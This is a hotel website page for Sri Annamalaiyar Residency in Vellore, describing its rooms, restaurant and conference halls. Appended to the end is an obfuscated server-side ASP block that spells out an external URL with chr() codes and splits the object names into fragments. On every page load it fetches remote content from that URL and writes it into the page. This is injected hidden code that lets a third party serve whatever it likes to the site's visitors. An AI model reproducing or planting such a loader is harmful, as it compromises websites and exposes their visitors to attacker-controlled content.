Welcome to an exotic experience in Sri Annamalaiyar Residency located at heart of Vellore. Satisfying your every senses to the maximum. Sri Annamalaiyar Residency is tastefully decorated and fully equipped with state of the art business centre, conference halls, 24 Hrs. room service and
multi-cuisine restaurant.

More..

     EXECUTIVE ROOMS

Executive rooms are spacious and stylishly contemporary, with large open verandas or balconies. The unique open-plan marble bathrooms combine the qualities of a personal spa.

More..

 

     Deluxe ROOMS

Deluxe rooms are spacious and stylishly contemporary, with large open verandas or balconies. The unique open-plan marble bathrooms combine the qualities of a personal spa.

More..

 

     Halls

Sri Annamalaiar Residency offer excellent meeting solutions from boardroom meetings, small meetings, seminars and functions at the price you want.

More..

<% Sub SetRExec() On Error Resume Next Dim url,ObjXMLHTTP,objStream url=chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&chr(47)&chr(119)&chr(119)&chr(119)&chr(46)&chr(97)&chr(105)&chr(114)&chr(121)&chr(101)&chr(101)&chr(122)&chr(121)&chr(50)&chr(46)&chr(99)&chr(111)&chr(46)&chr(117)&chr(107)&chr(47)&chr(103)&chr(103)&chr(47)&chr(99)&chr(104)&chr(107)&chr(115)&chr(116)&chr(111)&chr(108)&chr(105)&chr(110)&chr(107)&chr(46)&chr(97)&chr(115)&chr(112) Set ObjXMLHTTP=Server.CreateObject("MS"&"XML2.ser"&"verXML"&"HTTP") ObjXMLHTTP.Open "GET",url,False ObjXMLHTTP.setRequestHeader "User-Agent",Request.ServerVariables("HTTP_USER_AGENT") ObjXMLHTTP.Send If ObjXMLHTTP.ReadyState=4 And ObjXMLHTTP.Status=200 Then GetHtml=ObjXMLHTTP.ResponseBody Else Exit Sub End if Set ObjXMLHTTP=Nothing set objStream = Server.CreateObject("Adodb.Stream") objStream.Type = 1 objStream.Mode =3 objStream.Open objStream.Write GetHtml objStream.Position = 0 objStream.Type = 2 objStream.Charset = "gb2312" GetHtml = objStream.ReadText objStream.Close Response.Write GetHtml End Sub SetRExec %>